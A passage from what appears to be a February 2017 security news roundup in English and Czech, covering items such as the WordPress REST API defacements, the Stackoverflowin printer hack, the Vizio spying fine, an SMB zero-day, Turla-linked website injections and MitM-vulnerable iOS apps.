"There’s already a few exploit attempts that try to add spam images and content to a post. Due to the monetization possibilities, this will likely be the #1 route to abuse this vulnerability."
So, site administrators who have not yet updated their websites to the latest WordPress release 4.7.2 are urged to patch them immediately before becoming next target of SEO spammers and hackers.
U.S. Could Ask Visa Applicants for Social Media Passwords
8.2.2017 securityweek Social
US embassies could ask visa applicants for passwords to their own social media accounts in future background checks, Homeland Security Secretary John Kelly said Tuesday.
Kelly said the move could come as part of the effort to toughen vetting of visitors to screen out people who could pose a security threat.
He said it was one of the things under consideration especially for visitors from seven Muslim majority countries with very weak background screening of their own -- Iran, Iraq, Libya, Somalia, Sudan, Syria and Yemen.
"We're looking at some enhanced or some additional screening," Kelly told a hearing of the House Homeland Security Committee. "We may want to get on their social media, with passwords," he said.
"It's very hard to truly vet these people in these countries, the seven countries... But if they come in, we want to say, what websites do they visit, and give us your passwords. So we can see what they do on the internet."
"If they don't want to cooperate, then they don't come in" to the United States, he said.
Kelly stressed that no decision had been made on this, but said tighter screening was definitely in the future, even if it means longer delays for awarding US visas to visitors.
"These are the things we are thinking about," he said.
"But over there we can ask them for this kind of information and if they truly want to come to America, then they will cooperate. If not, next in line."
The seven countries were targeted in president Donald Trump's January 27 immigrant and refugee ban order, which has sense been at least temporarily blocked under court order.
Google Challenges Search Warrant Ruling
8.2.2017 securityweek Security
Google is planning to appeal a ruling made Friday that it must comply with search warrants involving customer data stored on servers outside of the United States. The case is similar to an earlier case involving Microsoft. In July 2016, the 2nd U.S. Circuit Court of Appeals in New York said Microsoft could not be forced to turn over emails stored on a server outside of the US. Now, however, Magistrate Judge Thomas Rueter in Philadelphia has taken the opposite view with Google.
Both cases involve search warrants issued under the 1986 Stored Communications Act (SCA). Microsoft was also initially ordered to comply. It appealed, and eventually Judge Susan Carney of the appeals court said that the SCA does not give US courts authority to force internet companies in the United States to seize customer email contents stored on foreign servers. At the time, Microsoft chief legal officer Brad Smith said, "It makes clear that the US Congress did not give the US Government the authority to use search warrants unilaterally to reach beyond US borders."
Google expected this precedent to be upheld in its own refusal to comply with a similar search warrant. The government's key argument is that no search is undertaken on foreign soil -- the data is lawfully brought back to the US, and the search is lawfully conducted within the US. For Microsoft, this argument was rejected; but for Google it has been accepted.
"Though the retrieval of the electronic data by Google from its multiple data centers abroad has the potential for an invasion of privacy, the actual infringement of privacy occurs at the time of disclosure in the United States," Rueter wrote.
Google has said it will appeal the ruling. "The magistrate in this case departed from precedent, and we plan to appeal the decision. We will continue to push back on overbroad warrants," it said in a statement.
If the appeal process fails, the case could have serious implications for US/EU business relations. EU data protection laws prevent the export of European personal information to any country that does not have adequate (that is, equivalent) data protection laws. That exclusion would include the US were it not for the special agreement known as Privacy Shield. It is the Privacy Shield that allows US tech giants such as Google and Facebook to operate in Europe; but it also allows any US commercial business to trade with the European Union.
Many commentators believe that Privacy Shield will fail European constitutional examination. It currently exists largely because of the political will on both sides to make it exist; but that will is already being eroded by new President Trump's apparent isolationism and support for US law enforcement.
Speaking to SecurityWeek about the effect of President Trump's executive order titled 'Enhancing Public Safety in the Interior of the United States' might have on Privacy Shield, David Flint (a senior partner at the MacRoberts law firm) commented, "It is unclear at this stage..." But he also added, "The more concerning issue for Privacy Shield is that there is a possible carve out for national security and similar issues and it remains unclear as to the extent that the new Administration will seek to define all foreigners' PII as 'a security issue'."
Privacy Shield, he explained, "is a complex interconnected matrix of law, policy and 'comfort letters'; absent any of these three legs, it is likely that some national data protection authorities may consider that there is no longer confidence in the implementation of that matrix (of which many were skeptical) and declare the US as having inadequate protection - now, and certainly after GDPR implementation."
Poland-based privacy consultant Alexander Hanff was more forthright. "Trump's Executive Order has accelerated the demise of a transatlantic lie - a lie which would have been exposed eventually by the CJEU [the Court of Justice, Europe's ultimate constitutional court] anyway; a lie which circumvents the constitutional rights of EU Citizens."
With such concern over an executive order that does not directly deal with European PII, it is difficult to see how US government access to European data directly from US companies -- especially when the data may be physically stored in Europe -- can withstand a legal challenge to the European courts. It is fair to say that in the current climate, if Google is forced to hand over foreign data on the basis of a search warrant, it could prove the end of Privacy Shield. Search warrants and the FBI could be as toxic to Privacy Shield as Prism and the NSA were to its predecessor Safe Harbor.
LOGmanager umí nově kooperovat i s jinými systémy správy logů
8.2.2017 SecurityWorld Software
Novou verzi systému LOGmanager, českého nástroje na správu a analýzu logů, uvedla na trh Sirwisa.
Mezi vylepšení nové verze patří například možnost přeposílání záznamů na nadřazené SIEM systémy jiných výrobců, kde se mohou logy podrobit pokročilé analýze nebo se korelují s informacemi z jiných zdrojů.
Novinky LOGmanageru verze 2.2.0 podle výrobce:
podpora pro přeposílání událostí na nadřazený syslog server
podpora pro příjem a parsování událostí v LEEF formátu
tlačítko na otestování spojení s aktualizačním serverem (System > Software)
vylepšená konfigurace webserveru (povolené je pouze TLSv1.2 šifrování spojení, přidány HSTS bezpečnostní hlavičky)
upravené dashboardy (zvětšené pole pro zadávání názvu polí, vylepšení pro zobrazování práce s Windows soubory, zobrazování alertů, postfix/sendmail a Windows Logons)
u blockly byla vypnutá funkce zoom na kolečku myši
Podstatou LOGmanageru je sběr všech relevantních eventů a logů organizace, jejich ukládání do centrálního zabezpečeného úložiště s předem definovanou retencí a možností prohledávat enormní množství dat v reálném čase. Výstupy prohledávaní se prezentují v textové i grafické podobě s vysokou mírou interakce vzhledem k nalezeným datům.
Systém rovněž umožňuje dlouhodobě ukládat data v nezpochybnitelné podobě pro potřeby shody s předpisy, požadavky pro forenzní analýzu a případné bezpečnostní audity. Řešení rovněž pomáhá plnit požadavky dané ze Zákona o kybernetické bezpečnosti.
Distributorem řešení LOGmanager v tuzemsku je firma Veracomp, pro implementaci lze využít i služeb řady certifikovaných partnerů.
Kyberzločinci vyřadili z provozu web rakouského parlamentu
7.2.2017 Novinky/Bezpečnost Kyber
Počítačoví piráti v neděli na zhruba dvacet minut vyřadili z provozu webové stránky rakouského parlamentu, k žádným neveřejným datům se ale nedostali. V prohlášení to uvedl parlament s tím, k žádným škodám nedošlo a že případem se zabývají bezpečnostní úřady. K činu se mezitím přihlásila turecká islamistická skupina Tým lvích vojáků (ANT), uvedla agentura Reuters.
"Napadení hackery bylo podle všeho vedeno takzvaným DDoS útokem, terčem podobného útoku byly loni v prosinci weby ministerstva zahraničí a obrany," upřesnil v prohlášení parlament.
Útok DDoS (Distributed Denial of Service) má vždy stejný scénář. Stovky tisíc počítačů začnou přistupovat v jeden okamžik na konkrétní server. Ten zpravidla nezvládne tak vysoké množství požadavků zpracovat a spadne. Pro běžné uživatele se pak takto napadená webová stránka tváří jako nedostupná.
ANT na svém webu uvádí, že chrání vlast, islám, národ a vlajku. Reuters poznamenal, že vztahy mezi Tureckem a Rakouskem v loňském roce značně ochladly poté, co Rakousko vyzvalo ke zmrazení přístupových rozhovorů mezi Evropskou unií a Ankarou.
Vídeň tak reagovala především na počínání tureckých úřadů po loňském neúspěšném pokusu o svržení prezidenta Recepa Tayyipa Erdogana. ANT rovněž na webu oznámil, že provádí operace proti prokurdské Lidové demokratické straně (HDP), rakouské centrální bance a jistému rakouskému letišti.
Útokům čelilo i Česko
Masivním útokům typu DDoS čelily v roce 2013 některé tuzemské servery. Směřovány byly nejprve na zpravodajské weby, potom na portál Seznam.cz, servery bank a telefonních operátorů.
Podle bezpečnostních expertů šlo tehdy o největší kybernetický útok v celé historii Česka.
„Musíme ověřit svůj účet informace!“ Špatný phishing tentokrát míří na zákazníky Fio Bank
7.2.2017 Živě.cz Phishing
Další bankou, která upozorňuje na phishingové útoky na její klienty, je Fio Bank. Nebezpečné e-maily rozesílají útočníci v těchto dnech a naštěstí jsou dobře rozeznatelné díky strojovému překladu s lámanou češtinou. Ani to však nemusí nejméně ostražitým uživatelům zabránit v kliknutí na odkaz a zadání přístupových údajů do podvodného formuláře.
Ani velmi špatná čeština často nemusí odradit uživatele ke kliknutí na odkaz a zadání údajů do podvodného formuláře (foto: Fio Bank)
E-maily mohou přijít například z adresy kontakt@fiobanka.prihlaste.cz. Web Přihlaste.cz přitom opravdu sdružuje weby internetového bankovnictví českých bank, ale i přihlašovací stránky sociálních sítí.
V každém případě neklikejte na odkaz v doručené zprávě a e-mail přesuňte do spamu nebo jej rovnou smažte. Pokud do podvodného formuláře zadáte svoje údaje, kontaktujte urychleně zákaznickou podporu.
Útočník ovládl 160 000 tiskáren, tiskne na nich varování před útoky
7.2.2017 Root.cz Hacking
„Pro lásku boží, zavřete si ten port,“ objevuje se na ASCII-artových letácích, které vyjíždějí ze 160 000 tiskáren po celém světě. Hodný hacker se tak snaží upozornit na bezpečnostní chybu v PostScriptu.
Skupina odborníků z University Alliance Ruhr objevila chybu „cross-site printing“ (XSP) ve staré implementaci PostScriptu a PJL v laserových tiskárnách. Chyba se týká tiskáren zvučných jmen jako Dell, Brother, Konica, Samsung, HP a Lexmark. Úspěšný útočník ji může zneužít ke získání hesel, dolování citlivých údajů z tiskové fronty nebo k odstavení zařízení.
Stará chyba v PS a PJL
Problém je o to horší, že chyba není nová, ale v zařízeních je ukrytá desítky let. Dovoluje útočníkovi procházet souborový systém tiskárny, pokud k ní má přístup a může tisknout – to lze zařídit po síti nebo pomocí USB. Objevitelé chyby vytvořili nástroj v Pythonu, který dovoluje vzdáleně manipulovat s tiskovou frontou, číst soubory na disku, přistupovat k paměti tiskárny nebo zařízení fyzicky zničit.
Celkem bylo zveřejněno šest různých bezpečnostních mezer umožňujících přetečení zásobníku, ukradení hesel a zachycení tiskových úloh. Jedna z metod nazvaná Cross-Origin Resource Sharing (CORS) dokáže ve spojení s XPS využít k prolomení webové rozhraní tiskárny, které je přístupné na TCP portu 9100. Útočník podstrčí oběti stránku se skrytým iframe, který pak začne z uživatelova počítače komunikovat s tiskárnou skrytou uvnitř sítě.
Požadavek může obsahovat příkazy v jazycích PostScript nebo PJL, jak popisuje wiki na hacking-printers.net. Podle autorů je možné také posílat data z tiskárny zpět do prohlížeče, pokud se k tomu připraví správně výstupy PostScriptu. Je tak možné na straně tiskárny například emulovat HTTP server a povolit si přístup z JavaScriptu. Tiskárnu je pak možné plně ovládnout.
Hodný útočník
Nedlouho po odhalení této bezpečnostní chyby začalo hučet 160 000 tiskáren po celém světě – od velkých kancelářských strojů až po tiskárny u pokladen. Neznámý útočník s přezdívkou Stackoverflowin je všechny vzdáleně ovládl a začal na nich tisknout varovné „letáky“ s informacemi o tom, že zařízení je zranitelné a mělo by být zabezpečeno.
Stackoverflowin je ve vaší tiskárně
Obrázků existuje víc, na internetu se začínají objevovat jejich fotografie. Společné mají to, že je na nich ASCII-artový obrázek (robot/počítač) a krátký vysvětlující text. Součástí je i kontakt nebo odkaz na twitterovský účet.
Pro lásku boží, zavřete si ten port!
Útočník o sobě tvrdí, že je mu méně než 18 let a že jeho nástroj hledá veřejně dostupné tiskárny s otevřeným přístupem RAW, IPP (Internet Printing Protocol) a LPR (Line Printer Remote) na TCP portech 9100, 631 a 515. Pak na ně posílá tiskové úlohy. Prý ho nejvíce překvapilo, jak snadné to celé bylo. Pomocí zmap prohledal internet a pak spustil jednoduchý program v C, který rozeslal úlohy. Do většiny tiskáren můžete takto poslat svůj firmware – ten nemusí být podepsaný, tvrdí.
Text vypadá například takto:
stackoverflowin the hacker god has returned, your printer is part of
a flaming botnet, operating on putin's forehead utilising BTI's
(break the internet) complex infrastructure.
[ASCII ART HERE]
For the love of God, please close this port, skid.
-------
Questions?
Twitter: https://twitter.com/lmaostack
-------
Uživatelé hlásí zprávy vyjíždějící z mnoha různých modelů tiskáren, například Afico, Brother, Canon, Epson, HP, Lexmark, Konica Minolta, Oki a Samsung. Není vyloučeno, že může jít i o výrobky dalších firem. Podle mladíka prý bylo takto vytištěno varování na 160 000 zařízeních, ale je napadnutelných tiskáren je více než 300 000.
Zatím jde o „hodný spam“, který má poukázat na potenciálně vážný problém. I když vytištěná prohlášení tvrdí, že tiskárny jsou součástí botnetu, není to podle útočníka pravda. Takové riziko tu ale skutečně je, pokud by tiskárny někdo začal masivně zneužívat, mohl by z nich postavit botnet podobný Mirai a libovolně zneužívat. Přestože tato ukázka je vlastně také nelegální, zatím nebyl nikdo skutečně nijak poškozen.
Provozujete síťovou tiskárnu? Podívejte se, jaké porty vystavuje do sítě.
Palo Alto Networks Unveils Big Product Updates, New Firewalls
7.2.2017 securityweek Safety
Palo Alto Networks on Tuesday announced the launch of PAN-OS 8.0, which brings major improvements to the company’s Next-Generation Security Platform, and several new hardware and virtual firewall appliances.
According to the company, PAN-OS 8.0 introduces more than 70 new enhancements and capabilities, including for securing cloud deployments and SaaS applications, preventing the theft and abuse of credentials, simplifying security operations, and blocking threats.
The threat prevention features are designed to prevent sandbox evasion, block command and control (C&C) communications, automate intelligence integration, and improve threat detection and alerting mechanisms.
PAN-OS 8.0 is designed to address credentials theft by automatically identifying and blocking phishing websites, preventing users from entering credentials on phishing sites, and providing a policy-based multi-factor authentication framework natively in the firewall to avert the use of stolen credentials.Palo Alto Networks
As for cloud and SaaS, the latest version of the operating system brings optimized workflow automation features for cloud services, and improved visibility, reporting and automation for SaaS applications.
Palo Alto Networks also announced the release of new hardware and virtual firewall appliances that complement PAN-OS 8.0. In addition to the existing 16 hardware appliances, the company now offers six new devices designed to provide improved traffic visibility and control.
The new appliances are PA-5260, PA-5250 and PA-5220 of the PA-5200 series, PA-850 and PA-820 of the PA-800 series, and the PA-220. The PA-5200 series devices are ideal for data centers, the PA-800 series is designed for medium-size networks and branch offices, and the PA-220 is ideal for small branch offices and remote locations.
Some of the new VM-Series virtual firewalls offer performance of up to 16 Gbps and are ideal for service providers and data centers, while the lower-end models are designed for minimal resource consumption and are best suited for virtual branch offices.
Rocket AI and the next generation of AV software
7.2.2017 Kaspersky Security
The annual Conference on Artificial Intelligence and Neural Information Processing Systems (NIPS) was held in Barcelona on 5–10 December 2016. This is, most likely, one of the two most important conferences in the AI field. This year, 5,680 AI experts attended the conference (the second of these large conferences is known as ICML).
This is not the first year that Kaspersky Lab is taking part in the conference – it is paramount for our experts to be well informed on the most up-to-date approaches to machine learning. This time, there were five Kaspersky Lab employees at NIPS, each from a different department and each working with machine learning implementation in order to protect users from cyberthreats.
However, my intent is to tell you not about the benefit of attending the conference but about an amusing incident that was devised and put into action by AI luminaries.
Rocket AI is the Next Generation of Applied AI
This story was covered in detail by Medium, and I shall only briefly relate the essence of the matter.
Right as the conference was happening, the www.rocketai.org website was created with this bubble on the main page (see picture below):
Rocket AI and the next generation of AV software
Please note that this is not just AI, but the next generation of AI. The idea of the product is described below.
Rocket AI and the next generation of AV software
The Temporally Recurrent Optimal Learning™ approach (abbreviated as “TROL(L)”), which was not yet known to science, was actively promoted on Twitter by conference participants. Within several hours, this resulted in five large companies contacting the project’s authors with investment offers. The value of the “project” was estimated at tens of millions of dollars.
Rocket AI and the next generation of AV software
Now, it’s time to lay the cards on the table: the Rocket AI project was created by experts in machine learning as a prank whose goal was to draw attention to the issue that was put perfectly into words by an author at Medium.com: “Artificial Intelligence has become the most hyped sector of technology. With national press reporting on its dramatic potential, large corporations and investors are desperately trying to break into this field. Many start-ups go to great lengths to emphasize their use of “machine learning” in their pitches, however trivial it may seem. The tech press celebrates companies with no products, that contribute no new technology, and at overly-inflated cost.”
In reality, the field of machine learning features nothing new; popular approaches to artificial intelligence are actually decades-old ideas.
“Clever teams are exploiting the obscurity and cachet of this field to raise more money, knowing that investors and the press have little understanding of how machine learning works in practice,” the author added.
An Anti-Virus of the Very Next Generation
It may seem that the outcome of the prank brought out nothing new: investors feel weakness for everything they hear about. Investment bubbles have existed and will continue to exist. Just our generation saw the advent of dotcoms, biometrics, and bitcoins. We have AI now, and I am sure that 2017 will give us something new as well.
Yet, after I had taken a peek at data-security start-ups, which are springing up like mushrooms after a rain and which claim that they employ the “very real” AI (of the very next generation), an amusing idea crossed my mind.
What would happen if we did the same thing that the respected AI experts did? We could come to agreements with other representatives in the cybersecurity area (I would like to point out the principle of “coopetition”, which combines market competition and cooperation in the areas of inspection and user protection) and create a joint project. Meet Rocket AV.
Rocket AI and the next generation of AV software
If respected IT experts were to advertise it all over their Twitter accounts, then — who knows? — maybe we could attract tens of millions of dollars’ worth of investments.
But no, it’d probably be better for us to continue doing what we are best at: protecting users from cyberthreats. This is the essence of True CyberSecurity.
Smart TV Maker Fined $2.2 Million For Spying on Its 11 Million Users
7.2.2017 thehackernews Virus
Smart TV Maker 'Vizio' Fined $2.2 Million For Spying on Its 11 Million Users
Your government is spying on you! Businesses are spying on you! Your phone and browser are constantly spying on you! Even your TV is spying on you!
Yes, you should also worry about your "smart" TV, as one of the world's biggest smart TV makers Vizio has been caught secretly collecting its consumers' data through over 11 Million smart TVs and then selling them to third-parties without the user's explicit consent.
But the good news is that the home entertainment hardware maker has been fined heavily for this practice.
The US Federal Trade Commission (FTC) announced on Monday that Vizio had spied on almost every customer from its Vizio smart TVs through its Smart Interactivity feature, and rather than fighting back the accusation any longer, the company has agreed to pay a $2.2 Million fine to settle the lawsuit.
"To settle the case, Vizio has agreed to stop unauthorized tracking, to prominently disclose its TV viewing collection practices, and to get consumers’ express consent before collecting and sharing viewing information," the FTC says.
"In addition, the company must delete most of the data it collected and put a privacy program in place that evaluates Vizio’s practices and its partners."
According to FTC, the smart TV maker installed data tracking software to collect viewing habits of 11 million of its smart TVs without informing its customers or seeking their consent.
Besides this, the company also collected each household's IP address, nearby access points, and zip code, and shared that information with other third-party companies, who used it for targeting advertising towards Vizio TV owners.
The data tracking software reportedly worked by collecting a selection of on-screen pixels every second your TV was on, and then compared that data to a database of known movies, television shows, and commercial commercials, and another type of video content. This practice is known as automatic content recognition (ACR).
According to the FTC, Vizio also recorded the date, time, channel of TV shows, and whether you watched the program live or recorded and took all that information and connected it to your IP address.
With this data in hand, anyone can know you and your television watching habits, and according to the complaint filed by the US Federal Trade Commission, "Vizio then turned that mountain of data into cash by selling consumers' viewing histories to advertisers and others."
However, Vizio has agreed to stop unauthorized tracking, prominently disclose its TV viewing collection practices, and get consumers' express consent before collecting or sharing their information with other companies.
How to Stop Your Smart TV From Spying on You
To check if your smart TV is also spying on you, open Vizio TV's settings menu or directly open HDTV Settings app and check if options under "Automated content recognition (ACR)" are ON. If Yes, follow below-mentioned steps to turn it off:
Open Setting Menu and Select System
Select Reset & Admin
Select Smart Interactivity.
Press arrow to change setting to off
Besides this, Vizio must also delete most of the data the company gathered and put a privacy program in place that evaluates its practices and partners.
Windows SMB 0-Day Risk Downplayed
7.2.2017 securityweek Vulnerebility
A 0-day vulnerability (CVE-2017-0016) affecting Windows’ SMBv3 (Server Message Block) protocol that was revealed last week is no longer considered a Critical issue, but High-risk.
The issue resides in the manner in which Windows handles SMB traffic and allows an unauthenticated attacker to remotely exploit and cause a denial of service. The issue is triggered when a vulnerable Windows client system connects to a malicious SMB server.
SMB is an application-layer network protocol that allows computers to access files, printers, serial ports, and miscellaneous communications between nodes on a local network. It also offers an authenticated inter-process communication mechanism.
The flaw was publicly revealed after the security researcher who discovered it published a proof-of-concept exploit on GitHub. The CERT Coordination Center (CERT/CC) at Carnegie Mellon University assessed the issue as critical and even suggested that it would have a severity score of 10, because of a possible exploitation for arbitrary code execution.
In the meantime, however, CERT revised the initial advisory and removed all mentions of arbitrary code execution, while also downgrading the severity score. With a CVSS (Common Vulnerability Scoring System) score of 7.8, the bug is rated High risk in the updated advisory.
“To be vulnerable, a client needs to support SMBv3, which was introduced in Windows 8 for clients and Windows 2012 on servers,” Johannes B. Ullrich, Ph.D., Dean of Research for the SANS Technology Institute, notes.
Initially mentioning only Windows 10 and Windows 8.1 as confirmed vulnerable platforms, the advisory has been modified to refer to their server counterparts as well: “We have confirmed the crash with fully-patched Windows 10 and Windows 8.1 client systems, as well as the server equivalents of these platforms, Windows Server 2016 and Windows Server 2012 R2,” CERT notes.
As before, the advisory points out that no practical solution to the issue is yet known, but that a workaround would involve blocking outbound SMB connections (TCP ports 139 and 445 along with UDP ports 137 and 138) from the local network to the WAN.
Given that this is no longer considered a Critical flaw, Microsoft is unlikely to patch it via an out-of-band update, but rather via the monthly set of security patches, which are expected to arrive next week. SecurityWeek contacted Microsoft for specifics on this but hasn’t heard back yet.
Turla-Linked Group Targets Embassies, Ministries
7.2.2017 securityweek Virus
Researchers at Forcepoint Security Labs have been monitoring the activities of a threat group that has targeted the websites of ministries, embassies and other organizations from around the world in a reconnaissance campaign.
While it’s unclear exactly who is behind the operation and what their motives are, evidence points to an advanced persistent threat (APT) actor that leverages techniques similar to the ones used by the Russia-linked group known as Turla.
According to the security firm, the attacks targeted the websites of foreign affairs ministries in Moldova, Kyrgyzstan and Uzbekistan; embassies of Russia, Zambia, Jordan and Iraq; a political party, a sports association and a government-run sustainability organization in Austria; a news company in Somalia, a socialist organization in Spain, a road safety entity in Ukraine; a French international cooperation organization; and a plant society and a union in Africa.
Experts pointed out that all of the targeted embassy websites belong to embassies located in the United States, in Washington D.C.
The attackers injected malicious code into each of the compromised sites in an effort to profile their visitors. The malicious code is disguised as a script associated with the web analytics service Clicky.
The hacked sites communicate with various domains; the oldest of them, nbcpost[.]com, registered in December 2015. In November 2016, the attackers started using psoncorp[.]com and mentalhealthcheck[.]net, both registered in February 2016, and this week they began using travelclothes[.]org, a domain registered in November.
Researchers said a majority of the websites were breached in April 2016 and some of them were under the attackers’ control for up to 10 months.
Forcepoint believes these attacks could be linked to Turla, also known as Waterbug, Venomous Bear and KRYPTON. This theory is based on the overlap in targets and the fact that Turla has been known to use fake web analytics scripts in their reconnaissance campaigns.
Switzerland’s GovCERT reported in May 2016 that the Turla attack aimed at Swiss defense firm RUAG involved malicious code disguised as Google Analytics scripts.
Kaspersky Lab confirmed recently that Turla, which has been around since at least 2007, is still active. Researchers discovered new JavaScript malware used by the group in attacks aimed at organizations located in Greece, Qatar and Romania.
WordPress content injection flaw abused in defacement campaigns
7.2.2017 securityaffairs Vulnerebility
According to experts at the security firm Sucuri, a critical content injection flaw in WordPress recently disclosed has already been exploited to deface thousands of websites.
Recently a critical vulnerability has been discovered in the WordPress CMS, it is a zero-day content injection flaw that affects the WordPress REST API.
The vulnerability was discovered by a security researcher at firm Sucuri who explained that the flaw could be exploited by an unauthenticated attacker to inject malicious content as well as for privilege escalation.
The attacker could exploit the zero-day content injection flaw to modify posts, pages, as well any other content.
“This privilege escalation vulnerability affects the WordPress REST API that was recently put into widespread use across WordPress sites with the introduction of official API endpoints in version 4.7.” states a blog post published by Sucuri. “One of these endpoints allows access (via the API) to view, edit, delete and create posts. Within this particular endpoint, a subtle bug allows visitors to edit any post on the site.
The REST API is enabled by default on all sites using WordPress 4.7 or 4.7.1. If your website is on these versions of WordPress then it is currently vulnerable to this bug.”
The impact of the flaw is severe, at least 18 million websites run the popular WordPress CMS, roughly 26% of the top 10,000 websites are running WordPress.
Experts from Sucuri have worked with the WordPress development team that fixed the zero-day content injection vulnerability in the last release 4.7.2 issued on January 26.
The bad news is that many WordPress websites still haven’t been updated leaving the installation open to the attacks.
Experts from Sucuri reported first attacks leveraging the above vulnerability less than 48 hours after its disclosure.
“In less than 48 hours after the vulnerability was disclosed, we saw multiple public exploits being shared and posted online. With that information easily available, the internet-wide probing and exploit attempts began.” states a report published by Sucuri.
The experts observed several massive defacement campaigns targeting WordPress across the world, in one of these campaigns, the hackers replaced the content of more than 60,000 web pages with “Hacked by” statements.
The other three operations, two of which seem to share a single IP address, have each targeted roughly 500 pages.
Sucuri monitored other three operations, two of which are linked to the same IP address as a source and have each targeted roughly 500 pages.
The risk when dealing with such kind of massive defacement is that crooks will leverage the vulnerability in WordPress to conduct Black SEO campaigns.
“What we expect to see is a lot more SEO spam (Search Engine Poisoning) attempts moving forward. There’s already a few exploit attempts that try to add spam images and content to a post. Due to the monetization possibilities, this will likely be the #1 route to abuse this vulnerability.” states Sucuri.
Search engine poisoning is a profitable activity for the cyber crime ecosystem.
Sucuri WAF network has observed a significant increase of the number of exploit attempts, in the last week, as reported in the following graph.
A recent report published by Sucuri states that more than half of the WordPress websites hijacked in 2016 were running an outdated version. By default, WordPress installations are updated automatically, so it is strongly suggested to website administrators to avoid disabling this feature.
Many WordPress Sites Hacked via Recently Patched Flaw
7.2.2017 securityweek Hacking
The critical vulnerability disclosed last week by WordPress developers has already been exploited to hack thousands of websites, security firm Sucuri warned on Monday.
When WordPress 4.7.2 was released on January 26, the developers of the content management system (CMS) informed users that the latest version patched three vulnerabilities, including SQL injection, cross-site scripting (XSS) and access control issues.
Roughly one week later, developers admitted that version 4.7.2 patched another flaw, described as an unauthenticated privilege escalation and content injection vulnerability affecting the REST API. The security hole allows an attacker to modify the content of any post or page on a targeted site.
The flaw, identified by researchers at Sucuri, was disclosed one week after the release of WordPress 4.7.2 to give users enough time to patch their installations. However, according to Sucuri, many WordPress websites still haven’t been updated.
Sucuri, which has tracked four different defacement campaigns, started seeing the first attacks leveraging this vulnerability less than 48 hours after disclosure.
In one of these campaigns, attackers replaced the content of more than 60,000 web pages with “Hacked by” messages. The other three operations, two of which seem to share a single IP address, have each targeted roughly 500 pages.
SecurityWeek has noticed that some of the compromised websites have also been re-defaced by a fifth actor. Fortunately, some of the affected sites have already been cleaned up and updated to WordPress 4.7.2.
While these attacks appear to be carried out mostly by script kiddies looking to boost their online reputation, researchers believe the vulnerability will be increasingly exploited for search engine poisoning.
“There’s already a few exploit attempts that try to add spam images and content to a post. Due to the monetization possibilities, this will likely be the #1 route to abuse this vulnerability,” explained Daniel Cid, CTO and founder of Sucuri.
The company’s WAF network has seen an increasing number of exploit attempts, reaching nearly 3,000 on Monday.
A recent report from Sucuri showed that more than half of the WordPress websites hijacked last year were outdated at the point of infection. By default, WordPress installations are updated automatically when a new version becomes available, but some administrators have disabled the feature, often due to concerns that the updates may break their websites.
Hackers Can Intercept Data From Popular iOS Apps
7.2.2017 securityweek Apple
Dozens of popular iOS applications are affected by vulnerabilities that allow man-in-the-middle (MitM) attackers to silently intercept data from connections that should be protected by TLS, a study has found.
The developers of verify.ly, a service designed for finding security issues in iOS apps, analyzed applications in the Apple App Store and identified hundreds that are likely vulnerable to data interception. Experts have tested each of them on an iPhone running iOS 10 and confirmed that 76 had been vulnerable.
According to Will Strafach, iOS security expert and developer of verify.ly, the affected applications have been downloaded more than 18 million times. The vulnerability is considered high risk in the case of 19 of the 76 applications, as they expose financial or medical service credentials or session authentication tokens.
The medium risk category includes 24 iOS apps, which also expose login credentials and session authentication tokens. The names of the high and medium risk apps have not been disclosed in order to give vendors time to patch the flaws.
Researchers identified 33 low risk applications, which allow attackers to intercept only partially sensitive information, including analytics data, email addresses, and login credentials that would only be entered on a trusted network. The list includes banking, VPN, entertainment, news, stock trading, chat, and Snapchat-related apps.
“This sort of [MitM] attack can be conducted by any party within Wi-Fi range of your device while it is in use. This can be anywhere in public, or even within your home if an attacker can get within close range,” Strafach explained. “Such an attack can be conducted using either custom hardware, or a slighly modified mobile phone, depending on the required range and capabilities. The best similar and well-understood form of attack to this would be the ability to read data from credit cards at a close range.”
Applications are vulnerable to these types of attacks due to the way their developers implement network-related code, which means only the developers can properly address the issue. However, end-users can protect themselves against potential attacks by utilizing the affected applications only over a cellular data connection, which is much more difficult to intercept compared to Wi-Fi.
An automated analysis of Android apps conducted back in 2014 by CERT/CC showed that thousands of applications were vulnerable to MitM attacks, and many of them are still vulnerable today.
76 Popular iOS apps are vulnerable to man-in-the-middle (MITM) attacks
7.2.2017 securityweek Apple
A study conducted on iOS mobile apps revealed that many of them are affected by security vulnerabilities that expose users to man-in-the-middle (MitM) attacks.
A new study confirms that dozens of iOS apps are affected by vulnerabilities that could be exploited by hackers to run man-in-the-middle (MitM) and intercept data from connections even if protected by TLS.
The study was conducted by the developers at verify.ly, a service that analyzes iOS apps searching for security issues. The experts analyzed applications in the Apple App Store and discovered hundreds of security issues that potentially expose mobile users to MITM attacks. All the applications have been tested on iPhone mobile devices running iOS 10 version and confirmed that 76 had been vulnerable.
The impact is serious if we consider that the affected applications account for more than 18 million downloads. The vulnerability is considered high risk in the case of 19 of the 76 applications. The applications expose sensitive data, including financial or medical service credentials or session authentication tokens.
“During the testing process, I was able to confirm 76 popular iOS applications allow a silent man-in-the-middle attack to be performed on connections which should be protected by TLS (HTTPS), allowing interception and/or manipulation of data in motion.” reads the blog post published by the researchers.
“According to Apptopia estimates, there has been a combined total of more than 18,000,000 (Eighteen Million) downloads of app versions which are confirmed to be affected by this vulnerability.”
Examining the key findings of the report we can see that:
the medium-risk category includes 24 iOS apps that expose login credentials and session authentication tokens.
the low-risk category includes 33 iOS apps that are affected by flaws that could be exploited by attackers to intercept only partially sensitive information such as email addresses and login credentials.
“This sort of attack can be conducted by any party within Wi-Fi range of your device while it is in use. This can be anywhere in public, or even within your home if an attacker can get within close range,” continues the post. “Such an attack can be conducted using either custom hardware, or a slighly modified mobile phone, depending on the required range and capabilities. The best similar and well-understood form of attack to this would be the ability to read data from credit cards at a close range.”
The security issues discovered by the experts are the result of the lax of adoption of secure coding techniques. Waiting for a fix, the users of the affected iOS apps need to avoid using them on Wi-Fi networks.
Phishme observed operators behind Locky and Sage ransomware share delivery infrastructure
7.2.2017 securityaffairs Virus
PhishMe security researchers discovered that the Locky and Sage ransomware were recently observed being distributed by the same delivery infrastructure.
It’s a common habit of cyber criminals to share delivery infrastructure to maximize the use of their resource and minimize the cost,
Recently the Locky ransomware was observed being distributed through the delivery infrastructure used to spread the Sage ransomware.
A couple of weeks ago, researchers from the Cisco Security Team has noticed traces of traffic from the dormant Necurs botnet and warned of a possible new massive ransomware spam campaign.
Now researchers at Phishme, reported cybercriminals are sharing the delivery infrastructure for both Sage and Locky, likely because operators behind the Locky threat are working on securing new distribution channels, after the Necurs botnet, the main driver behind the Locky and Dridex activity, slightly vanished.
